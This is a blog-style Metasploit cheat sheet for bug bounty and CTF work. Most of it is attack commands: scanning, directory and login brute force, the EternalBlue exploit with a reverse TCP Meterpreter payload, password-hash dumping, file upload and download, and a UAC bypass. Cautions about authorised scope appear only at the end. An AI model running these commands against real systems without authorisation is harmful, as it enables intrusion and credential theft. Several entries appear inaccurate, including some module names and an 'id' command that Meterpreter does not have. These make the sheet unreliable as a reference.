---
title: "Metasploit Cheat Sheet for Penetration Testing"
date: 2024-12-13T14:30:00+00:00
tags: ["Metasploit", "Bug Bounty", "Ethical Hacking", "CTF", "Capture The Flag", "Security Testing"]
categories: ["Bug Bounty", "Cybersecurity", "CTF"]
author: "weems"
description: "A comprehensive Metasploit cheat sheet for performing ethical security analysis during bug bounty programs and Capture The Flag competitions."
---

# Metasploit Cheat Sheet for Ethical Bug Bounty Programs & CTF

Metasploit is one of the most powerful tools for ethical hackers, penetration testers, and security researchers. This cheat sheet provides the essential commands and steps to use **Metasploit** for security analysis during **ethical bug bounty programs** or **Capture the Flag (CTF)** competitions. Whether you are testing an authorized application for vulnerabilities or looking to sharpen your skills in CTFs, Metasploit can assist in a variety of tasks, including reconnaissance, exploitation, post-exploitation, and more.

## 1. Starting Metasploit

To begin using Metasploit, launch the framework from the command line:

```bash
msfconsole           # Start the Metasploit console
```

## 2. Information Gathering (Reconnaissance)

### Search for Modules (e.g., Scanners, Vulnerabilities)

Search for modules related to the target:

```bash
search <keyword>       # Search for exploit, scanner, or auxiliary modules
```

### Use an Auxiliary Module (e.g., Port Scan)

Use an auxiliary module for port scanning:

```bash
use auxiliary/scanner/portscan/tcp       # TCP Port scanner
set RHOSTS <target_ip>                   # Set target IP address
set THREADS <number_of_threads>          # Number of threads for faster scanning
run                                      # Execute the scan
```

### Service Version Enumeration

For HTTP version enumeration:

```bash
use auxiliary/scanner/http/http_version  # Enumerate HTTP versions
set RHOSTS <target_ip>                   # Set the target IP address
run
```

### Directory Brute-Forcing (for Web Servers)

Brute-force directories on a web server:

```bash
use auxiliary/scanner/http/dir_scanner   # Directory brute-force scanner
set RHOSTS <target_ip>                   # Set the target IP address
set THREADS 10                           # Adjust threads for performance
run
```

## 3. Exploitation

### Search for Exploits

Search for specific exploits in the database:

```bash
search <vulnerability_name>  # For example: search ms17_010 for EternalBlue
```

### Use an Exploit Module

For example, to use the **MS17-010 EternalBlue** exploit:

```bash
use exploit/windows/smb/ms17_010_eternalblue  # Use the MS17-010 SMB exploit
set RHOSTS <target_ip>                       # Set the target IP address
set RPORT 445                                # Set the target port (445 for SMB)
exploit                                      # Execute the exploit
```

## 4. Payloads

Metasploit allows you to use various payloads to gain control over the compromised system.

### List Available Payloads

```bash
show payloads                   # List all available payloads
```

### Select a Payload

To use a **reverse TCP Meterpreter** payload:

```bash
set PAYLOAD windows/meterpreter/reverse_tcp   # Select reverse TCP Meterpreter payload
```

### Set Payload Options (LHOST and LPORT)

Set the local IP address (LHOST) and port (LPORT) for the reverse connection:

```bash
set LHOST <your_ip>              # Set your local IP address for reverse connection
set LPORT <your_port>            # Set the port number for reverse shell connection
```

### Exploit with Payload

Run the exploit along with the payload:

```bash
exploit                         # Execute the exploit with the selected payload
```

## 5. Post-Exploitation (Ethical Usage)

Once the target system is compromised, you can perform post-exploitation activities while adhering to ethical guidelines.

### List Active Sessions

To view active sessions:

```bash
sessions                    # List all active sessions
```

### Interact with a Session

To interact with a specific session:

```bash
sessions -i <session_id>      # Interact with a specific session (e.g., sessions -i 1)
```

### Get System Information

To gather information about the compromised system:

```bash
sysinfo                      # Get system info (OS, architecture, etc.)
id                            # Check the current user ID
getuid                        # Show the current user ID (administrator or not)
```

### Privilege Escalation

Check for privilege escalation opportunities. If allowed, you can attempt privilege escalation:

```bash
getuid                        # Check if the current user has admin/root privileges
```

### Dump Password Hashes (if allowed by rules)

If the bug bounty program allows you to dump password hashes:

```bash
hashdump                      # Dump password hashes (Windows-based systems)
```

### Upload a File

You can upload files to the target machine for further exploitation:

```bash
upload <local_file> <remote_path>   # Upload a file (e.g., upload /path/to/payload.exe C:/Windows)
```

### Download a File

Download a file from the compromised target:

```bash
download <remote_file> <local_path>  # Download a file from the compromised system
```

### Create Reverse Shell (Post-Exploitation)

For post-exploitation, you may want to set up a reverse shell:

```bash
run post/windows/manage/reverse_tcp LHOST=<your_ip> LPORT=<your_port>
```

## 6. Privilege Escalation (Local)

Privilege escalation can give you full control over the target system. Use local exploits to escalate privileges.

### Search for Privilege Escalation Exploits

```bash
search type:exploit local          # Search for local privilege escalation exploits
```

### Use Local Exploits

Example of using a local exploit:

```bash
use exploit/windows/local/bypassuac  # Bypass User Account Control (UAC) on Windows
set SESSION <session_id>             # Set the session ID to exploit
exploit                              # Run the local exploit
```

## 7. Useful Auxiliary Modules

Metasploit has several useful auxiliary modules for scanning and enumeration.

### HTTP Bruteforce (Common for Login Pages)

To brute-force HTTP login forms:

```bash
use auxiliary/scanner/http/httppost  # Brute-force HTTP POST login forms
set RHOSTS <target_ip>               # Set target IP address
set USER_FILE <usernames_file>       # File containing usernames to test
set PASS_FILE <passwords_file>       # File containing passwords to test
run
```

### SMB Version Scanning

To detect SMB version and vulnerabilities:

```bash
use auxiliary/scanner/smb/smb_version  # Detect SMB version
set RHOSTS <target_ip>                 # Set the target IP address
run
```

### Directory Brute-Force (Common for Web Servers)

To brute-force directories on a web server:

```bash
use auxiliary/scanner/http/dir_scanner   # Brute-force HTTP directories
set RHOSTS <target_ip>                   # Set target IP
set THREADS 10                           # Adjust threads for performance
run
```

## 8. Handling Sessions

Once you have established a session, you can interact with it or manipulate it.

### Background a Session

To background an active session and return to msfconsole:

```bash
background                  # Send the current session to the background
```

### Interact with a Backgrounded Session

To return to a specific session:

```bash
sessions -i <session_id>     # Interact with a specific session
```

### Kill a Session

To terminate a session:

```bash
sessions -k <session_id>     # Kill the specified session
```

## 9. Metasploit Help and Documentation

Metasploit offers built-in documentation for help.

### Help Command

```bash
help                        # Display general help in msfconsole
```

### Info on a Module

```bash
info <module_name>          # Display detailed information on a specific module
```

### Show Available Options for a Module

```bash
show options                # Display available options for the current module
```

## 10. Important Considerations

- **Stay within Scope**: Always adhere to the rules of engagement. Only test the systems explicitly authorized by the bug bounty program or CTF competition.
- **Report Responsibly**: When you identify vulnerabilities, report them with detailed steps, proof of concept (PoC), and suggested mitigations.
- **Don't Exploit Beyond the Minimum**: Metasploit can automate many tasks, but use it responsibly and ethically. Avoid denial-of-service attacks or data exfiltration unless explicitly allowed.

## 11. Useful Tips

- **Reconnaissance First**: Always start with reconnaissance to gather basic information about the target (e.g., open ports, services, subdomains).
- **Use Multi-Handler**: For reverse shells, use a multi-handler to maintain persistent communication with compromised systems.
- **Stay Updated**: Ensure your Metasploit Framework is up to date to take advantage of the latest exploits and features.

